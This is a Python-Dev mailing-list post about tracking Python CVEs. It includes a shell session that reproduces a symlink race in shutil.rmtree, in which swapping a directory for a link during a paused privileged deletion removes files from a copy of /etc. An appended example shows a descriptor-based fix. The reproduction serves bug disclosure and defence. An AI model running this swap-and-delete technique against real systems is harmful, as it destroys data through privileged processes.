[Python-Dev] CVE tracking
Mart Somermaa mrts at mrts.pri.ee
Mon Nov 24 13:05:11 CET 2008
- Previous message: [Python-Dev] subprocess.Popen: change default buffer size?
- Next message: [Python-Dev] CVE tracking
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]
I created a script that parses the http://cve.mitre.org/cgi-bin/cvekey.cgi?keyword=python Python-related CVE list and classifies the CVEs as follows:
"ok" -- CVE has references to bugs.python.org
"warnings" -- CVE has references to Python SVN revisions or an issue in bugs.python.org refers to it (i.e. the problem is probably fixed, but the CVE should really be updated to link to the issue that is probably listed in bugs.python.org)
"errors" -- CVE has no references to Python issues or SVN, nor does any issue in bugs.python.org have references to the CVE id
The script is at http://dpaste.com/hold/92930/
The results are at http://dpaste.com/hold/92929/
There were 35 errors, 8 warnings, 5 CVEs were OK.
In an ideal world, the references would be symmetric, i.e. every Python-related CVE would have references to one or more issues in bugs.python.org and these issues would also refer back to the CVE id.
As for the rmtree problem that Gisle Aas raised, this seems to apply as of Python 2.6:
# emulate removing /etc
$ sudo cp -a /etc /root/etc/
$ sudo python2.6
>>> for i in xrange(0, 50000):
...     with open("/root/etc/" + str(i), "w") as f:
...         f.write("0")
...
$ ls /root/etc > orig_list.txt
$ mkdir /tmp/attack
$ cp -a /root/etc/* /tmp/attack
$ sudo python2.6
>>> from shutil import rmtree
>>> rmtree('/tmp/attack')
# press ctrl-z to suspend execution
^Z
[1]+  Stopped                 sudo python2.6
$ mv /tmp/attack /tmp/dummy; ln -s /root/etc /tmp/attack
$ fg
sudo python2.6
Traceback (most recent call last):
  File "<stdin>", line 1, in <module>
  File "/usr/local/lib/python2.6/shutil.py", line 225, in rmtree
    onerror(os.rmdir, path, sys.exc_info())
  File "/usr/local/lib/python2.6/shutil.py", line 223, in rmtree
    os.rmdir(path)
OSError: [Errno 20] Not a directory: '/tmp/attack'
$ ls /root/etc > new_list.txt
$ diff -q orig_list.txt new_list.txt
Files orig_list.txt and new_list.txt differ
If the attack weren't possible, the lists would not differ.
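The mitigation for the race shown above is to stop addressing entries by path once the directory has been listed. Added example, not code from the post or from CPython's shutil: a descriptor-relative rmtree (the approach later Python 3 releases took) re-run against the post's swap inside a temporary directory. It assumes Linux (dir_fd support, O_NOFOLLOW), and the names safe_rmtree, _rmtree_fd, demo and the after_listing test hook are this example's own.

```python
import os
import tempfile

def _rmtree_fd(dir_fd, after_listing=None):
    """Delete below an opened directory via dir_fd, so a path swapped for a
    symlink after listing (the post's ctrl-z trick) cannot redirect the deletes."""
    with os.scandir(dir_fd) as it:
        entries = list(it)
    if after_listing:
        after_listing()  # test seam: demo() swaps the path here, in the race window
    for entry in entries:
        if entry.is_dir(follow_symlinks=False):  # symlinks are never descended
            child = os.open(entry.name, os.O_RDONLY | os.O_DIRECTORY | os.O_NOFOLLOW, dir_fd=dir_fd)
            try:
                _rmtree_fd(child)
            finally:
                os.close(child)
            os.rmdir(entry.name, dir_fd=dir_fd)
        else:
            os.unlink(entry.name, dir_fd=dir_fd)

def safe_rmtree(path, after_listing=None):
    """Open the top directory once with O_NOFOLLOW (a symlink fails with ELOOP)
    and work from that descriptor; the closing rmdir never follows a link."""
    fd = os.open(path, os.O_RDONLY | os.O_DIRECTORY | os.O_NOFOLLOW)
    try:
        _rmtree_fd(fd, after_listing)
    finally:
        os.close(fd)
    os.rmdir(path)

def demo():
    """Constructed re-run of the post's scenario ('protected' stands in for /root/etc,
    'attack' for /tmp/attack): returns (protected intact?, files left in tree, error?)."""
    base = tempfile.mkdtemp()
    protected, attack, dummy = (os.path.join(base, n) for n in ("protected", "attack", "dummy"))
    for d in (protected, attack):
        os.mkdir(d)
        for i in range(5):
            with open(os.path.join(d, str(i)), "w") as f:
                f.write("0")
    def swap():  # emulates: mv /tmp/attack /tmp/dummy; ln -s /root/etc /tmp/attack
        os.rename(attack, dummy)
        os.symlink(protected, attack)
    try:
        safe_rmtree(attack, after_listing=swap)
        reported = False
    except NotADirectoryError:  # the closing rmdir meets the swapped-in symlink
        reported = True
    return len(os.listdir(protected)) == 5, len(os.listdir(dummy)), reported
```

The renamed tree is emptied through the descriptor, the stand-in for /root/etc keeps all five files, and the swap surfaces as the same "Not a directory" error the post shows rather than as silent deletion of the wrong tree.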